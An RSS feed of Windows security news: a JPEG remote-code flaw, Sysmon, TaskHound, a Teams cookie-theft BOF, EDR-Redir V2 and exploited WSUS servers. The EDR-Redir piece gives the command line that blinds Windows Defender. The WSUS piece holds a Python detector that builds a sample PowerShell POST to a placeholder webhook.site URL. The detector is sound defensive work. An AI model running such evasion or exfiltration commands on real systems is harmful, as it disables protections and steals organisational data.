Windows Archives - Cyber Security News https://cybersecuritynews.com/category/windows/ (feed last updated Thu, 20 Nov 2025 16:27:09 +0000)

Critical Windows Graphics Vulnerability Lets Hackers Seize Control with a Single Image https://cybersecuritynews.com/critical-windows-graphics-vulnerability/ Thu, 20 Nov 2025 16:26:58 +0000

The post Critical Windows Graphics Vulnerability Lets Hackers Seize Control with a Single Image appeared first on Cyber Security News.

A critical remote code execution flaw in Microsoft’s Windows Graphics Component allows attackers to seize control of systems using specially crafted JPEG images.

With a CVSS score of 9.8, this vulnerability poses a severe threat to Windows users worldwide, as it requires no user interaction for exploitation.

Discovered in May 2025 and patched by Microsoft on August 12, 2025, the issue stems from an untrusted pointer dereference in the windowscodecs.dll library, affecting core image processing functions.

Attackers can embed the malicious JPEG in everyday files like Microsoft Office documents, enabling silent compromise when the file is opened or previewed.

This flaw highlights ongoing risks in legacy graphics handling, where seemingly innocuous image decoding can result in a complete system takeover. As Windows powers billions of devices, unpatched systems remain highly exposed to phishing campaigns or drive-by downloads.

Zscaler ThreatLabz identified the vulnerability through targeted fuzzing of the Windows Imaging Component, focusing on JPEG encoding and decoding paths in windowscodecs.dll.

The entry point for exploitation lies in the GpReadOnlyMemoryStream::InitFile function, where manipulated buffer sizes allow attackers to control memory snapshots during file mapping.

Fuzzing revealed a crash triggered by dereferencing an uninitialized pointer at jpeg_finish_compress+0xcc, exposing user-controllable data via heap spraying.

Stack traces from WinDbg analysis pointed to key functions like CJpegTurboFrameEncode::HrWriteSource and CFrameEncodeBase::WriteSource, confirming the flaw in JPEG metadata encoding processes.

This uninitialized resource issue enables arbitrary code execution without privileges, making it exploitable over networks. Microsoft confirmed the vulnerability affects automatic image rendering in applications reliant on the Graphics Component.

Affected Versions and Patching

The vulnerability impacts recent Windows releases, particularly those using vulnerable builds of windowscodecs.dll. Organizations must prioritize updates to mitigate risks, as exploitation could chain with other attacks for lateral movement in networks.

Product                          Impacted Version   Patched Version
Windows Server 2025              10.0.26100.4851    10.0.26100.4946
Windows 11 Version 24H2 (x64)    10.0.26100.4851    10.0.26100.4946
Windows 11 Version 24H2 (ARM64)  10.0.26100.4851    10.0.26100.4946
Windows Server 2025 (Core)       10.0.26100.4851    10.0.26100.4946

Exploitation Mechanics and Proof-of-Concept

Exploiting CVE-2025-50165 involves crafting a JPEG that triggers the pointer dereference during decoding, often via embedded files in Office or third-party apps.

For 64-bit systems, attackers bypass Control Flow Guard using Return-Oriented Programming (ROP) chains in sprayed heap chunks of size 0x3ef7. This pivots execution by creating read-write-execute memory with VirtualAlloc and loading shellcode for persistent access.

[Figure: Windows Graphics Vulnerability Exploit]

Zscaler’s proof-of-concept demonstrates heap manipulation through an example app that allocates, frees, and processes Base64-encoded JPEGs, achieving RIP control.

While no in-the-wild exploits have been reported, the low complexity and wide network reach make it a prime target for ransomware or espionage. CFG is disabled by default in 32-bit versions, easing attacks on older setups.

Users should immediately apply the August 2025 Patch Tuesday updates via Windows Update, targeting high-value assets first. Disable automatic image previews in email clients and enforce sandboxing for untrusted files. Zscaler has implemented cloud-based protections to block exploit attempts.

This incident underscores the perils of unpatched graphics libraries in enterprise environments, where JPEGs are ubiquitous in workflows.

As threat actors evolve tactics, timely patching remains the strongest defense against such pixel-perfect poisons. With no observed active exploitation yet, proactive measures can prevent widespread damage.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.


Sysmon – Go-to Tool for IT Admins, Security Pros, and Threat Hunters Coming to Windows https://cybersecuritynews.com/sysmon-tool-windows/ Wed, 19 Nov 2025 16:43:28 +0000

The post Sysmon – Go-to Tool for IT Admins, Security Pros, and Threat Hunters Coming to Windows appeared first on Cyber Security News.

Microsoft is bringing native Sysmon functionality directly into Windows, eliminating the need for manual deployment and separate downloads.

Starting next year, Windows 11 and Windows Server 2025 will include System Monitor (Sysmon) capabilities, transforming how security teams detect threats and investigate incidents.

For years, Sysmon has been the go-to tool for IT administrators, security professionals, and threat hunters seeking deep visibility into Windows systems.

However, deploying and maintaining it across thousands of endpoints has been cumbersome, requiring manual downloads, consistent updates, and operational overhead that introduces security risks when updates lag.

The native integration solves these critical pain points. Security teams gain instant threat visibility with the same rich functionality, custom configuration files, and automated compliance through standard Windows Update.

Feature                        Description
Process Monitoring             Tracks process creation events and command-line activity
Network Connection Tracking    Monitors outbound communications and unusual connections
Credential Access Detection    Exposes process access attempts to LSASS memory
File System Monitoring         Detects file creation in suspicious directories
Process Tampering Detection    Identifies process hollowing and herpaderping techniques
WMI Persistence Tracking       Captures WMI events and persistence mechanisms
Custom Configuration Support   Allows custom configuration files to filter events
Native Event Logging           Writes events to Windows Event Logs
Automated Updates              Receives monthly updates through Windows Update
Official Support               Microsoft provides dedicated customer service

Most importantly, organizations now receive official customer service support, eliminating the risks associated with unsupported production environments.

Sysmon in Windows delivers granular diagnostic data that powers advanced threat detection and technical investigation.

Security applications can access these events through Windows Event Logs (Applications and Services Logs / Microsoft/Windows/Sysmon/Operational) or feed directly into SIEM systems.

Key detection events include process creation monitoring to identify suspicious command-line activity, network connection tracking to flag Command and Control (C2) traffic, and process access detection to expose credential dumping attempts.

The tool also identifies file creation in suspicious locations, detects tampering techniques such as process hollowing, and captures WMI persistence mechanisms.

Enabling Sysmon functionality is straightforward. Administrators can activate it through the Turn Windows Features On or Off dialog, then install it with a single command: sysmon -i.

This command installs the driver, starts the service immediately, and applies the default configuration, with no separate tooling required.

Microsoft plans to expand capabilities further, including enterprise-scale management and AI-powered inferencing.

Imagine automatically detecting credential theft or lateral movement patterns with edge AI, dramatically reducing dwell time and improving organizational resilience.

This native integration represents a significant shift in how Windows handles security monitoring, combining OS-level signals with automated updates to build more resilient, secure-by-design systems.



TaskHound Tool – Detects Windows Scheduled Tasks Running with Elevated Privileges and Stored Credentials https://cybersecuritynews.com/taskhound-windows-scheduled-task-tool/ Mon, 17 Nov 2025 14:19:37 +0000

The post TaskHound Tool – Detects Windows Scheduled Tasks Running with Elevated Privileges and Stored Credentials appeared first on Cyber Security News.

A new open-source security tool, TaskHound, helps penetration testers and security professionals identify high-risk Windows scheduled tasks that could expose systems to attacks.

The tool automatically discovers tasks running with privileged accounts and stored credentials, making it a valuable addition to security assessments.

What Makes TaskHound Different?

TaskHound stands out by automating the discovery of dangerous scheduled tasks across Windows networks.

Instead of manually searching through system logs, the tool scans remote machines over SMB and parses task XML files to identify security weaknesses.

Feature                      Use Case
Tier 0 Detection             Identify high-value administrative account exposure
BloodHound Integration       Correlate tasks with attack paths for risk assessment
Password Analysis            Work with the existing BloodHound infrastructure
Offline Analysis             Analyze tasks in OPSEC-conscious environments
BOF Implementation           Beacon-based operations without direct network access
Credential Guard Detection   Evaluate DPAPI dump success likelihood
SID Resolution               Improve readability in mixed SID/username environments
Multi-format Support         Work with existing BloodHound infrastructure
Flexible Authentication      Flexible authentication for various network scenarios
Multiple Output Formats      Integrate findings into security workflows and reporting

It looks for tasks running as administrative accounts, privileged users, or Tier 0 accounts, typically the highest-value targets for attackers.

The tool integrates with BloodHound, a popular network security visualization platform.

This integration enables security teams to automatically correlate scheduled tasks with BloodHound’s attack path data, revealing which tasks pose the most significant risk in their environment.

TaskHound includes several powerful features for threat hunters. It automatically detects tasks assigned to Tier 0 users, such as Domain Admins and Enterprise Admins.

The tool analyzes when credentials were last changed compared to when tasks were created, helping identify old passwords that could be vulnerable to offline cracking.

The platform supports both modern BloodHound Community Edition and legacy BloodHound formats, making it compatible with existing security infrastructure.

TaskHound can also work offline, analyzing previously collected XML files without requiring direct network access.

For operators using AdaptixC2, the tool includes a Beacon Object File implementation. During a penetration test, TaskHound quickly identifies exploitation opportunities.

Tasks running under compromised accounts can be manipulated to gain system access.

The tool provides detailed reporting showing task locations, associated credentials, creation dates, and recommended next steps for each finding.

[Figure: TaskHound tool output]

The creator emphasizes strict OPSEC (operational security) considerations. Since the tool relies on standard SMB operations, network defenders could detect its activity.

For sensitive assessments, users can employ the standalone BOF version or manually collect tasks for offline analysis.

The project roadmap includes a direct BloodHound database connector and a dedicated NetExec module to expand integration with other popular security frameworks.

The GitHub developer also plans automated credential extraction for offline decryption.

TaskHound fills an essential gap in Windows privilege-escalation assessment, automating a tedious manual process while providing actionable intelligence to security teams protecting enterprise networks.



Microsoft Defender for O365 New Feature Allows Security Teams to Trigger Automated Investigations https://cybersecuritynews.com/microsoft-defendero365-new-feature/ Thu, 13 Nov 2025 12:44:11 +0000

The post Microsoft Defender for O365 New Feature Allows Security Teams to Trigger Automated Investigations appeared first on Cyber Security News.

Microsoft has rolled out enhanced remediation capabilities in Defender for Office 365 (O365), enabling security teams to initiate automated investigations and other actions directly from the Advanced Hunting interface.

This feature, launched on November 10, 2025, empowers admins and analysts to respond to email threats more swiftly without requiring policy modifications.

The new actions (Submit to Microsoft, adding entries to the Tenant Allow/Block List, and Initiate Automated Investigation) were previously limited to the Threat Explorer tool but are now integrated into Advanced Hunting.

This allows for programmatic threat hunting using custom Kusto Query Language (KQL) queries, streamlining workflows for security operations centers (SOCs).

By bringing these tools together, Microsoft addresses customer feedback, reducing the time needed to triage and remediate malicious emails.

[Figure: Microsoft Defender for O365]

Advanced Hunting, part of Microsoft Defender XDR, already provides deep visibility into cross-domain threats across email, endpoints, and identities. With this update, users can select query results and trigger responses contextually based on message delivery status, such as purging from inboxes or quarantines.

For bulk selections exceeding 100 messages, options like email purge and proposed remediations remain available, ensuring scalability for large-scale incidents. Threat Explorer continues to operate independently, providing complementary views of real-time detections.

[Figure: Microsoft Defender for O365]

This rollout affects admins and security analysts leveraging Microsoft Defender XDR, with actions enabled by default across worldwide tenants.

The actions cannot be removed from the user interface, but existing administrative policies, including role-based access control (RBAC), are fully respected to maintain compliance. Organizations can scope access via the Microsoft 365 Defender portal under Settings > Permissions > Roles, preventing unauthorized use.

To prepare, teams should audit current hunting queries and integrate the new actions into playbooks for automated responses. Communicating these changes to SOC stakeholders and providing targeted training will minimize disruptions.

For instance, updating documentation on initiating automated investigations can accelerate adoption, especially in environments handling high volumes of phishing or malware-laden emails.

The enhancement aligns with broader trends in automated investigation and response (AIR) in Defender for O365 Plan 2, where remediation clusters around malicious files or URLs for faster threat neutralization.

By default, AIR actions require approval, but configurations for auto-remediation on message clusters can further reduce manual overhead, though clusters over 10,000 items prompt reviews. In Advanced Hunting schemas like EmailPostDeliveryEvents, auto-remediated items appear with ActionType “Automated Remediation” and ActionTrigger “Automation,” aiding forensic analysis.

This update maintains proactive defense in an era of sophisticated email-based attacks, such as ransomware and business email compromise.



Zoom Workplace for Windows Vulnerability Allow Users to Escalate Privilege https://cybersecuritynews.com/zoom-workplace-for-windows-vulnerability/ Tue, 11 Nov 2025 13:25:55 +0000

The post Zoom Workplace for Windows Vulnerability Allow Users to Escalate Privilege appeared first on Cyber Security News.

A security vulnerability has been discovered in Zoom Workplace VDI Client for Windows that could allow attackers to gain elevated privileges on affected systems.

The flaw, tracked as CVE-2025-64740, has been assigned a high severity rating with a CVSS score of 7.5, according to Zoom’s security bulletin ZSB-25042.

The vulnerability stems from improper verification of cryptographic signatures in the Zoom Workplace VDI Client for Windows installer.

This weakness can be exploited by an authenticated user with local access to escalate their privileges on the system.

Zoom Workplace for Windows Vulnerability

When successfully exploited, attackers could gain higher-level permissions, potentially executing unauthorized commands, accessing sensitive data, or compromising system integrity.

The security flaw affects Zoom Workplace VDI Client for Windows versions before 6.3.14, 6.4.12, and 6.5.10 in their respective tracks.

While the vulnerability requires local access and user interaction, making it somewhat complex to exploit, the potential impact remains significant.

The CVSS vector string indicates it can affect confidentiality, integrity, and availability of the compromised system.

Bulletin:          ZSB-25042
CVE ID:            CVE-2025-64740
CVSS Score:        7.5
CVSS Vector:       CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H
Affected Products: Zoom Workplace VDI Client for Windows before versions 6.3.14, 6.4.12 and 6.5.10

Privilege escalation vulnerabilities are particularly concerning in enterprise environments where Zoom is widely deployed for remote work and virtual desktop infrastructure.

Attackers who already have limited access to a system could exploit this flaw to gain administrative rights, bypass security controls, and potentially move laterally across networks to compromise additional resources.

The improper cryptographic signature verification means the installer cannot properly validate whether the software being installed is legitimate or has been corrupted.

This creates an opportunity for threat actors to manipulate the installation process and inject malicious code with elevated permissions.

Zoom has released security updates to address this vulnerability and strongly recommends that all users update their Zoom Workplace VDI Client for Windows immediately.

Organizations using affected versions should prioritize patching to mitigate the risk of exploitation. Users can download the latest secure versions from Zoom’s official download page at zoom.us/download.

System administrators should verify that all installations across their organization are updated to versions 6.3.14, 6.4.12, 6.5.10, or later, depending on their deployment track.

This disclosure underscores the importance of maintaining up-to-date software, especially for widely used communication platforms in enterprise settings.



Microsoft Warns Windows Systems May Enter BitLocker Recovery After October 2025 Updates https://cybersecuritynews.com/windows-systems-bitlocker-recovery/ Wed, 05 Nov 2025 09:31:31 +0000

The post Microsoft Warns Windows Systems May Enter BitLocker Recovery After October 2025 Updates appeared first on Cyber Security News.

Microsoft has issued an urgent advisory for Windows users, highlighting a potential glitch that could force certain devices into the BitLocker recovery screen after installing security updates released on or after October 14, 2025.

The company is actively investigating the problem, which affects select client versions of Windows and primarily impacts Intel-based systems supporting Connected Standby. This power-saving feature keeps devices networked during low-energy states.

While the issue does not compromise data security, it could disrupt user workflows by requiring a one-time entry of the BitLocker recovery key upon restart.

According to Microsoft’s Windows release health documentation, affected users may encounter the recovery prompt during boot-up or restarts following the updates.

Once the key is provided, the device should resume normal operation without further interruptions. This rollback to recovery mode stems from interactions between the updates and BitLocker’s encryption mechanisms, though Microsoft has not detailed the exact root cause yet.

The advisory emphasizes that no server editions are impacted, limiting the scope to consumer and enterprise client environments.

Affected Versions and Update Details

The issue targets three key client platforms: Windows 11 version 25H2 and 24H2, both tied to originating knowledge base article KB5066835, and Windows 10 version 22H2 under KB5066791.

Users can reference Microsoft’s issue trackers such as WI1183025 for Windows 11 25H2, WI1183026 for 24H2, and WI1183027 for Windows 10 22H2 via the Windows Release Health portal for the latest status.

Affected Platform          Message ID   Originating KB
Windows 11, version 25H2   WI1183025    KB5066835
Windows 11, version 24H2   WI1183026    KB5066835
Windows 10, version 22H2   WI1183027    KB5066791

These updates, rolled out to patch critical vulnerabilities and enhance system stability, inadvertently triggered the BitLocker behavior on compatible hardware.

Intel processors with Connected Standby support appear most vulnerable, as the feature’s network persistence may conflict with post-update boot processes.

Microsoft recommends that affected organizations apply a Known Issue Rollback (KIR) to sidestep the problem. This mitigation tool, detailed in the company’s IT Pro blog, requires contacting Microsoft Support for Business to deploy organization-wide.

Individual users should ensure they have their BitLocker recovery keys handy, typically stored in Microsoft accounts or printed during setup, to avoid extended downtime.

In the interim, Microsoft urges caution before applying the October updates on impacted devices, suggesting a pause for non-urgent systems.

The company promises updates as the investigation progresses, with a focus on a permanent fix in future patches. Cybersecurity experts advise proactively backing up recovery keys, especially for enterprise fleets that rely on BitLocker for compliance.



Windows 11 24H2/25H2 Update Causes Task Manager to be Active After Closure https://cybersecuritynews.com/windows-11-update-task-manager/ Mon, 03 Nov 2025 11:20:46 +0000

The post Windows 11 24H2/25H2 Update Causes Task Manager to be Active After Closure appeared first on Cyber Security News.

Microsoft has released a non-security update for Windows 11 versions 24H2 and 25H2 that introduces an unusual bug affecting one of the operating system’s most essential utilities.

The update, designated as KB5067036, is causing Task Manager to continue running in the background even after users close the application. This issue has been officially acknowledged by Microsoft as a known problem in the latest optional update.

The KB5067036 update is part of Microsoft’s routine maintenance releases designed to improve functionality, performance, and reliability across Windows 11 systems.

This particular update falls under the category of optional non-security preview releases, which are typically made available during the fourth week of each month.

These updates allow users to receive new features and improvements ahead of the mandatory security updates that roll out on the second Tuesday of every month, commonly known as Patch Tuesday.

What the Update Brings to Windows 11

The update includes various improvements to AI components for Copilot Plus PC experiences, with enhanced versions of Image Search, Content Extraction, Semantic Analysis, and Settings Model.

Additionally, it contains a servicing stack update designated as KB5067035, which ensures that devices can properly receive and install future Windows updates. The servicing stack is a critical component that maintains the reliability and robustness of the Windows update system.

According to Microsoft’s official documentation, Task Manager may continue operating in the background after users attempt to close the application.

This behavior represents a disruption from normal functionality, where closing Task Manager should completely terminate the process.

The issue affects both Windows 11 version 24H2 and the newer 25H2 release, indicating that the problem spans multiple current Windows versions.

Task Manager is a crucial system utility that allows users to monitor running applications, track system performance, manage startup programs, and terminate unresponsive processes.

Having it continue running in the background could potentially consume system resources unnecessarily and may cause confusion for users who expect the application to fully close when dismissed.

The KB5067036 update is available through Windows Update as an optional download. Users can access it by navigating to Start, then Settings, followed by Update and Security, and finally Windows Update.

The update appears in the Optional Updates Available section, where users can choose to download and install it. For users who install the update and encounter issues, Microsoft has provided removal instructions.

However, there is an important limitation: while the cumulative update can be removed using the DISM command-line tool with the Remove-Package option, the servicing stack update cannot be removed once installed.

Users cannot use the Windows Update Standalone Installer with the uninstall switch on the combined package, as this method will not work for packages that include servicing stack updates.

Microsoft continues to monitor feedback and typically addresses known issues in subsequent updates. Users experiencing the Task Manager problem may want to wait for a resolution before installing this optional update.



New BOF Tool Exploits Microsoft Teams’ Cookie Encryption Allowing Attackers to Access User Chats https://cybersecuritynews.com/bof-tool-exploits-microsoft-teams/ Mon, 03 Nov 2025 07:27:49 +0000

The post New BOF Tool Exploits Microsoft Teams’ Cookie Encryption Allowing Attackers to Access User Chats appeared first on Cyber Security News.

A specialized Beacon Object File (BOF) has been developed to extract authentication cookies from Microsoft Teams without disrupting the application.

This development builds on recent findings that expose how Teams stores sensitive access tokens, potentially allowing attackers to impersonate users and access chats, emails, and documents.

The tool, released by Tier Zero Security, adapts an existing browser exploitation technique to bypass Teams’ file-locking mechanisms, raising fresh concerns about endpoint security in enterprise environments.

The innovation stems from a detailed analysis of Teams’ authentication process. As outlined in a recent research post by RandoriSec, Microsoft Teams embeds a browser window using the msedgewebview2.exe process, a Chromium-based component that handles login via Microsoft’s online services.

During authentication, this process writes cookies to a SQLite database in a manner similar to traditional web browsers.

These cookies contain access tokens that grant entry to Teams conversations, Skype features, and even the Microsoft Graph API for broader Office 365 interactions.

However, modern Chromium browsers have bolstered their defenses. They now protect encryption keys through a COM-based IElevator service that runs with SYSTEM privileges, verifying the caller’s legitimacy by checking the executable’s secure installation path.

This setup demands either execution within the browser process or elevated administrator access to decrypt cookie values.

In contrast, Teams relies on the simpler Data Protection API (DPAPI) tied to the current user’s master key, making its cookies comparatively easier to target once the encryption key is obtained.

Overcoming File Locks With Process Injection

A key hurdle in the original research was Teams’ runtime behavior: the application locks its Cookies database file while running, even in the background, preventing direct reads or copies.

Killing the MS-Teams.exe process, as suggested in the post, would alert users and trigger security monitoring.

To address this, the researchers drew inspiration from the Cookie-Monster-BOF, an open-source tool that extracts cookies from live browser processes by duplicating file handles and invoking the IElevator service.

The new Teams-Cookies-BOF repurposes this logic for the messaging app. Instead of terminating Teams, it runs directly within the ms-teams.exe process, potentially via DLL or COM hijacking, to identify child webview processes holding open handles to the Cookies file.

It duplicates these handles, reads the file contents on the fly, and decrypts the values using the user’s DPAPI master key. This approach ensures stealth, as the tool mimics legitimate process activity without file system disruptions.

Notably, the BOF’s flexibility extends beyond Teams injection. It can execute in any process sharing the same user privileges, querying webview children across the system to download relevant cookies.

While this broadens its applicability, it also introduces detectable indicators, such as unusual handle operations on unrelated processes.

For demonstration, the researchers shared a Gist script that achieves similar results from a neutral context, though it risks pulling non-Teams cookies as collateral.

Implications For Red Teamers And Defenders

The decryption mechanism mirrors Cookie-Monster-BOF exactly, employing AES-256-GCM after extracting the nonce and encrypted payload from the “v10”-tagged values in the database.

Once obtained, the tokens enable API calls to fetch conversation histories, read messages, or send phishing content on behalf of victims, escalating risks in lateral movement or social engineering campaigns.

Tier Zero Security has made the BOF publicly available on GitHub, compatible with any C2 framework supporting Beacon payloads, and it requires no arguments for basic use.

This release underscores a persistent gap in Teams’ security model compared to hardened browsers. Organizations should prioritize behavioral monitoring for process injection, enforce least-privilege execution, and consider endpoint detection rules targeting DPAPI accesses or webview handle manipulations.

As hybrid work relies heavily on Teams, such vulnerabilities highlight the need for ongoing scrutiny of embedded browser components in productivity apps.

New EDR-Redir V2 Blinds Windows Defender on Windows 11 With Fake Program Files https://cybersecuritynews.com/edr-redir-v2-blinds-windows-defender/ Sun, 02 Nov 2025 06:25:55 +0000

An upgraded release of the EDR-Redir tool, EDR-Redir V2, is designed to evade Endpoint Detection and Response (EDR) systems by exploiting Windows bind link technology in a novel way.

According to the researcher TwoSevenOneT, this version targets the parent directories of EDR installations, such as Program Files, to create redirection loops that blind security software without disrupting legitimate applications.

Previously, EDR-Redir used direct folder redirections, but protections often blocked those attempts; V2 circumvents this by looping subfolders back to themselves while isolating the EDR’s path for manipulation.

The tool builds on Windows’ bind link feature, introduced in Windows 11 24H2, which allows filesystem namespace redirection via the bindflt.sys driver without kernel privileges.

EDR solutions like antivirus programs typically lock down their subfolders in locations such as Program Files or ProgramData to prevent tampering, but they cannot fully restrict writes to parent directories without breaking system installations.

EDR-Redir V2 queries all subfolders in the target parent, like Program Files, and mirrors them in a controlled directory, such as C:\TMP\TEMPDIR. It then establishes bidirectional bind links between these mirrors and originals, forming loops that maintain normal access for non-EDR software.

The EDR’s specific subfolder, such as Windows Defender’s in C:\ProgramData\Microsoft, is excluded from the loop and redirected solely to the attacker’s TEMPDIR.

This setup enables DLL hijacking or file drops in the redirected space, tricking the EDR into loading malicious components. Developers often overlook such parent-level redirections, potentially affecting a wide range of EDRs.

EDR-Redir V2 on Windows Defender

In a demonstration on Windows 11, TwoSevenOneT applied EDR-Redir V2 against Windows Defender, located in C:\ProgramData\Microsoft\Windows Defender.

The tool was executed with parameters specifying the target folder, redirection destination, and exception path: EDR-Redir.exe C:\ProgramData\Microsoft c:\TMP\TEMPDIR "C:\ProgramData\Microsoft\Windows Defender".

Console output detailed the bind link creations, confirming success without errors. Post-execution, Defender’s access attempts looped through TEMPDIR, effectively blinding it to its original files and allowing potential evasion tactics.

A visualization showed the redirection in action, with Defender viewing TEMPDIR as its operational parent. The GitHub repository for EDR-Redir provides the tool for download and further testing. A demo video on YouTube illustrates the process in real-time.

This technique highlights vulnerabilities in how EDRs protect against filesystem manipulations at the parent level, rendering folder-specific safeguards ineffective. Attackers could disable EDR services or inject code, operating undetected in user mode with minimal events.

While no widespread exploits are reported yet, the method’s simplicity raises concerns for enterprise environments. Defenders should monitor bind link usage in critical directories like Program Files and implement integrity checks on EDR paths.

EDR vendors may need to enhance protections for parent folders without impeding usability. TwoSevenOneT shares ongoing research on X (@TwoSevenOneT) for pentesting insights. As evasion tools evolve, proactive monitoring of kernel filters remains essential.

Hackers Exploiting Windows Server Update Services Flaw to Steal Sensitive Data from Organizations https://cybersecuritynews.com/wsus-vulnerability-actively-exploited/ Sat, 01 Nov 2025 00:48:25 +0000

A Windows Server Update Services (WSUS) vulnerability is being actively exploited in the wild. Criminals are using it to steal sensitive data from organizations across various industries.

The vulnerability, tracked as CVE-2025-59287, was patched by Microsoft on October 14, 2025, but attackers quickly began abusing it after proof-of-concept code became publicly available on GitHub.

Sophos telemetry indicates that exploitation began on October 24, 2025, just hours after technical analysis and exploit code were released online.

The threat actors targeted internet-facing WSUS servers in universities, technology companies, manufacturing firms, and healthcare organizations, primarily based in the United States.

While Sophos has confirmed six incidents so far, security experts believe the actual number of compromised organizations is significantly higher.

How the Attacks Unfold

The exploitation leverages a critical deserialization bug in WSUS that allows unauthenticated remote code execution. When attackers target vulnerable servers, they inject Base64-encoded PowerShell commands through nested command processes running under IIS worker privileges.

The malicious script executes silently on compromised systems, gathering valuable intelligence about targeted organizations.

The harvested data includes external IP addresses and ports of vulnerable hosts, enumerated lists of Active Directory domain users, and detailed network interface configurations. This information is then exfiltrated to webhook.site URLs controlled by the attackers.
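As an added example (not code from Sophos or from the article), the chain described above written as detection logic in Python: it flags PowerShell that descends from the IIS worker process, decodes any -EncodedCommand payload, and checks the decoded script for webhook.site. The process events, the script and the webhook.site ID are constructed samples, not values from the incidents.

```python
import base64
import re

IIS_WORKER = "w3wp.exe"          # IIS worker process that hosts WSUS
EXFIL_HOST = "webhook.site"      # exfiltration endpoint reported in the incidents
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def encode_ps(script: str) -> str:
    """PowerShell -EncodedCommand takes Base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Constructed sample events (not real telemetry). 'chain' is the process ancestry,
# oldest first. The webhook.site ID is a placeholder, not one from the incidents.
_SAMPLE_SCRIPT = "Invoke-WebRequest -Uri https://webhook.site/PLACEHOLDER-ID -Method POST -Body 'x'"
SAMPLE_EVENTS = [
    {"id": "evt-1", "chain": ["w3wp.exe", "cmd.exe", "powershell.exe"],
     "cmdline": "powershell.exe -NoP -enc " + encode_ps(_SAMPLE_SCRIPT)},
    {"id": "evt-2", "chain": ["explorer.exe", "powershell.exe"],      # admin, not IIS
     "cmdline": "powershell.exe -EncodedCommand " + encode_ps(_SAMPLE_SCRIPT)},
    {"id": "evt-3", "chain": ["w3wp.exe", "cmd.exe", "powershell.exe"],
     "cmdline": "powershell.exe -Command Get-Date"},
]

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(event: dict) -> list:
    """Reasons an event matches the reported WSUS post-exploitation chain ([] if none)."""
    chain = [p.lower() for p in event["chain"]]
    if IIS_WORKER not in chain[:-1]:
        return []   # encoded PowerShell alone is common in legitimate admin tooling
    reasons = [f"PowerShell descends from {IIS_WORKER}: " + " -> ".join(chain)]
    script = decode_encoded_command(event["cmdline"])
    if script is not None:
        reasons.append("uses Base64-encoded PowerShell command")
        if EXFIL_HOST in script.lower():
            reasons.append(f"decoded script contacts {EXFIL_HOST}")
    return reasons

def scan(events: list) -> list:
    """Return (event id, reasons) for every event that matches."""
    return [(e["id"], r) for e in events if (r := analyze(e))]
```

Running scan(SAMPLE_EVENTS) reports evt-1 with all three reasons and evt-3 for IIS ancestry alone, while the administrator-launched evt-2 is not flagged.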

Sophos researchers discovered four unique webhook.site URLs associated with the attacks, with three linked to the platform’s free service tier.

By analyzing the request logs on two publicly accessible URLs, researchers observed that exploitation began at 02:53 UTC on October 24 and reached the maximum threshold of 100 requests by 11:32 UTC the same day.

The rapid exploitation of this vulnerability demonstrates how quickly threat actors move to weaponize newly disclosed flaws.

The indiscriminate nature of the attacks suggests cybercriminals are scanning for exposed WSUS servers on the internet and exploiting them opportunistically rather than targeting specific organizations.

According to Rafe Pilling, Director of Threat Intelligence at Sophos, “This activity shows that threat actors moved quickly to exploit this critical vulnerability in WSUS to collect valuable data from vulnerable organizations.”

The stolen data could be used for reconnaissance, follow-up attacks, or sold to other malicious actors on underground marketplaces. Organizations running WSUS services should immediately apply Microsoft’s security patches and conduct thorough reviews of their network configurations.

Additionally, companies should identify any WSUS server interfaces exposed to the internet and restrict access to WSUS ports 8530 and 8531 only to systems that genuinely require connectivity.

Security teams should review logs for signs of exploitation and implement network segmentation to prevent lateral movement if compromises are discovered.
